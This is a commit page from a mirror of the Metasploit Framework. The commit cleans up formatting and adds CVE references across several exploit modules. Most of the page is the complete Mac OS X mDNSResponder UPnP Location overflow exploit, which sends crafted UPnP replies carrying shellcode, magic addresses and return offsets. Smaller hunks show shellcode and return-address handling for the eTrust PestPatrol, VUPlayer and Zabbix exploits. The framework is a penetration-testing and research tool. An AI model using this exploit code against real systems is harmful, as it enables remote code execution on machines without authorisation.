infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

some cleanups, added some CVE references 

git-svn-id: file:///home/svn/framework3/trunk@8304 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-01-28 20:15:32 +00:00
parent 7789db860d
commit 4751d83cb8
8 changed files with 262 additions and 231 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

409
modules/exploits/osx/mdns/upnp_location.rb
View File

@ -1,201 +1,226 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X mDNSResponder UPnP Location Overflow',
'Platform' => 'osx',
'DefaultOptions' => {
'SRVPORT' => 1900,
'RPORT' => 0
},
'Targets' => [
[ '10.4.8 x86', { # mDNSResponder-108.2
'Arch' => ARCH_X86,
include Exploit::Remote::Udp
# Offset to mDNSStorage structure
'Offset' => 21000,
'Magic' => 0x8fe510a0,
'g_szRouterHostPortDesc' => 0x53dc0,
}
],
[ '10.4.0 PPC', { # mDNSResponder-107
'Arch' => ARCH_PPC,
'Offset' => 21000,
'Magic' => 0x8fe51f4c,
'Ret' => 0x8fe41af8,
}
],
],
'DefaultTarget' => 1,
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X mDNSResponder UPnP Location Overflow',
'Description' => %q{
TODO
},
'License' => MSF_LICENSE,
'Author' =>
[
'TBD'
],
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
'SRVPORT' => 1900,
'RPORT' => 0
},
'Payload' =>
{
'BadChars' => "\x00\x3a\x2f",
'StackAdjustment' => 0,
'Space' => 468
}
'Platform' => 'osx',
'Targets' =>
[
[ '10.4.8 x86',
{ # mDNSResponder-108.2
'Arch' => ARCH_X86,
# Offset to mDNSStorage structure
'Offset' => 21000,
'Magic' => 0x8fe510a0,
'g_szRouterHostPortDesc' => 0x53dc0,
}
],
[ '10.4.0 PPC',
{ # mDNSResponder-107
'Arch' => ARCH_PPC,
'Offset' => 21000,
'Magic' => 0x8fe51f4c,
'Ret' => 0x8fe41af8,
}
],
],
'DefaultTarget' => 1))
'Payload' => {
'BadChars' => "\x00\x3a\x2f",
'StackAdjustment' => 0,
'Space' => 468
}
))
register_options([
Opt::LHOST(),
OptPort.new('SRVPORT',
[ true, "The UPNP server port to listen on", 1900 ])
], self.class)
register_options([
Opt::LHOST(),
OptPort.new('SRVPORT',
[true, "The UPNP server port to listen on", 1900])
], self.class)
@mutex = Mutex.new()
@found_upnp_port = false
@key_to_port = Hash.new()
@upnp_port = 0
@client_socket = nil
end
def check
#
# TODO: Listen on two service ports, one a single character
# shorter than the other (i.e 1900 and 19000). If the copy was
# truncated by strlcpy, it will connect to the service listening
# on the shorter port number.
#
upnp_port = scan_for_upnp_port()
if (upnp_port > 0)
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unsupported
end
end
def upnp_server(server)
client = server.accept()
request = client.readline()
if (request =~ /GET \/([\da-f]+).xml/)
@mutex.synchronize {
@found_upnp_port = true
@upnp_port = @key_to_port[$1]
# Important: Keep the client connection open
@client_socket = client
}
end
end
def scan_for_upnp_port
@upnp_port = 0
@found_upnp_port = false
upnp_port = 0
# XXX: Do this in a more Metasploit-y way
server = TCPServer.open(1900)
server_thread = Thread.new { self.upnp_server(server) }
begin
socket = Rex::Socket.create_udp
upnp_location =
"http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
puts "[*] Listening for UPNP requests on: #{upnp_location}"
puts "[*] Sending UPNP Discovery replies..."
i = 49152;
while i < 65536 && @mutex.synchronize { @found_upnp_port == false }
key = sprintf("%.2x%.2x%.2x%.2x%.2x",
rand(255), rand(255), rand(255), rand(255), rand(255))
@mutex.synchronize {
@key_to_port[key] = i
}
upnp_reply =
"HTTP/1.1 200 Ok\r\n" +
"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
"USN: uuid:7076436f-6e65-1063-8074-0017311c11d4\r\n" +
"Location: #{upnp_location}/#{key}.xml\r\n\r\n"
socket.sendto(upnp_reply, datastore['RHOST'], i)
i += 1
end
@mutex.synchronize {
if (@found_upnp_port)
upnp_port = @upnp_port
end
}
ensure
server.close
server_thread.join
end
return upnp_port
end
def exploit
#
# It is very important that we scan for the upnp port. We must
# receive the TCP connection and hold it open, otherwise the
# code path that uses the overwritten function pointer most
# likely won't be used. Holding this connection increases the
# chance that the code path will be used dramatically.
#
upnp_port = scan_for_upnp_port()
if upnp_port == 0
raise "Could not find listening UPNP UDP socket"
end
datastore['RPORT'] = upnp_port
socket = connect_udp()
if (target['Arch'] == ARCH_X86)
space = "A" * target['Offset']
space[0, payload.encoded.length] = payload.encoded
pattern = Rex::Text.pattern_create(47)
pattern[20, 4] = [target['Magic']].pack('V')
pattern[44, 3] = [target['g_szRouterHostPortDesc']].pack('V')[0..2]
boom = space + pattern
usn = ""
elsif (target['Arch'] == ARCH_PPC)
space = "A" * target['Offset']
pattern = Rex::Text.pattern_create(48)
pattern[20, 4] = [target['Magic']].pack('N')
#
# r26, r27, r30, r31 point to g_szUSN+556
# Ret should be a branch to one of these registers
# And we make sure to put our payload in the USN header
#
pattern[44, 4] = [target['Ret']].pack('N')
boom = space + pattern
#
# Start payload at offset 556 within USN
#
usn = "A" * 556 + payload.encoded
end
upnp_reply =
"HTTP/1.1 200 Ok\r\n" +
"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
"USN: #{usn}\r\n" +
"Location: http://#{boom}\r\n\r\n"
puts "[*] Sending evil UPNP response"
socket.put(upnp_reply)
puts "[*] Sleeping to give mDNSDaemonIdle() a chance to run"
sleep(10)
handler()
disconnect_udp()
end
@mutex = Mutex.new()
@found_upnp_port = false
@key_to_port = Hash.new()
@upnp_port = 0
@client_socket = nil
end
def check
#
# TODO: Listen on two service ports, one a single character
# shorter than the other (i.e 1900 and 19000). If the copy was
# truncated by strlcpy, it will connect to the service listening
# on the shorter port number.
#
upnp_port = scan_for_upnp_port()
if (upnp_port > 0)
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unsupported
end
end
def upnp_server(server)
client = server.accept()
request = client.readline()
if (request =~ /GET \/([\da-f]+).xml/)
@mutex.synchronize {
@found_upnp_port = true
@upnp_port = @key_to_port[$1]
# Important: Keep the client connection open
@client_socket = client
}
end
end
def scan_for_upnp_port
@upnp_port = 0
@found_upnp_port = false
upnp_port = 0
# XXX: Do this in a more Metasploit-y way
server = TCPServer.open(1900)
server_thread = Thread.new { self.upnp_server(server) }
begin
socket = Rex::Socket.create_udp
upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
puts "[*] Listening for UPNP requests on: #{upnp_location}"
puts "[*] Sending UPNP Discovery replies..."
i = 49152;
while i < 65536 && @mutex.synchronize {
@found_upnp_port == false
}
key = sprintf("%.2x%.2x%.2x%.2x%.2x",
rand(255), rand(255), rand(255), rand(255), rand(255))
@mutex.synchronize {
@key_to_port[key] = i
}
upnp_reply = "HTTP/1.1 200 Ok\r\n" +
"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
"USN: uuid:7076436f-6e65-1063-8074-0017311c11d4\r\n" +
"Location: #{upnp_location}/#{key}.xml\r\n\r\n"
socket.sendto(upnp_reply, datastore['RHOST'], i)
i += 1
end
@mutex.synchronize {
if (@found_upnp_port)
upnp_port = @upnp_port
end
}
ensure
server.close
server_thread.join
end
return upnp_port
end
def exploit
#
# It is very important that we scan for the upnp port. We must
# receive the TCP connection and hold it open, otherwise the
# code path that uses the overwritten function pointer most
# likely won't be used. Holding this connection increases the
# chance that the code path will be used dramatically.
#
upnp_port = scan_for_upnp_port()
if upnp_port == 0
raise "Could not find listening UPNP UDP socket"
end
datastore['RPORT'] = upnp_port
socket = connect_udp()
if (target['Arch'] == ARCH_X86)
space = "A" * target['Offset']
space[0, payload.encoded.length] = payload.encoded
pattern = Rex::Text.pattern_create(47)
pattern[20, 4] = [target['Magic']].pack('V')
pattern[44, 3] = [target['g_szRouterHostPortDesc']].pack('V')[0..2]
boom = space + pattern
usn = ""
elsif (target['Arch'] == ARCH_PPC)
space = "A" * target['Offset']
pattern = Rex::Text.pattern_create(48)
pattern[20, 4] = [target['Magic']].pack('N')
#
# r26, r27, r30, r31 point to g_szUSN+556
# Ret should be a branch to one of these registers
# And we make sure to put our payload in the USN header
#
pattern[44, 4] = [target['Ret']].pack('N')
boom = space + pattern
#
# Start payload at offset 556 within USN
#
usn = "A" * 556 + payload.encoded
end
upnp_reply = "HTTP/1.1 200 Ok\r\n" +
"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
"USN: #{usn}\r\n" +
"Location: http://#{boom}\r\n\r\n"
puts "[*] Sending evil UPNP response"
socket.put(upnp_reply)
puts "[*] Sleeping to give mDNSDaemonIdle() a chance to run"
sleep(10)
handler()
disconnect_udp()
end
end

4
modules/exploits/unix/misc/zabbix_agent_exec.rb
View File

@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@ -26,13 +24,13 @@ class Metasploit3 < Msf::Exploit::Remote
in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
can only be exploited if the attacker can hijack the IP address
of an authorized server (as defined in the configuration file).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-4502' ],
[ 'OSVDB', '60956' ],
[ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
],

2
modules/exploits/windows/browser/ie_unsafe_scripting.rb
View File

@ -1,5 +1,5 @@
##
#
# $Id$
##
##

1
modules/exploits/windows/fileformat/activepdf_webgrabber.rb
View File

@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
[ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
],
'DefaultOptions' =>

34
modules/exploits/windows/fileformat/etrust_pestscan.rb
View File

@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
@ -17,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'CA eTrust PestPatrol ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)
sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
[ 'CVE', '2009-4225' ],
[ 'URL', 'http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm' ],
],
'DefaultOptions' =>
@ -40,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Jun 5 2007',
'DefaultTarget' => 0))
@ -51,13 +55,13 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def exploit
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))

19
modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb
View File

@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
@ -25,8 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-4265' ],
[ 'OSVDB', '60681' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10319' ]
],
'DefaultOptions' =>
{

22
modules/exploits/windows/fileformat/vuplayer_cue.rb
View File

@ -1,5 +1,5 @@
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'VUPlayer CUE Buffer Overflow',
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
},
'Payload' =>
{
'Space' => 750,
@ -39,18 +39,18 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ],
[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ],
],
'Privileged' => false,
'DisclosureDate' => 'Aug 18 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.cue']),
], self.class)
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.cue']),
], self.class)
end
@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
cue << ".BIN""\"" + " BINARY\r\n"
cue << "TRACK 01 MODE1/22352\r\n"
cue << "INDEX 01 00:00:00\r\n"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(cue)
end
end

2
modules/exploits/windows/misc/poppeeper_uidl.rb
View File

@ -1,5 +1,5 @@
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/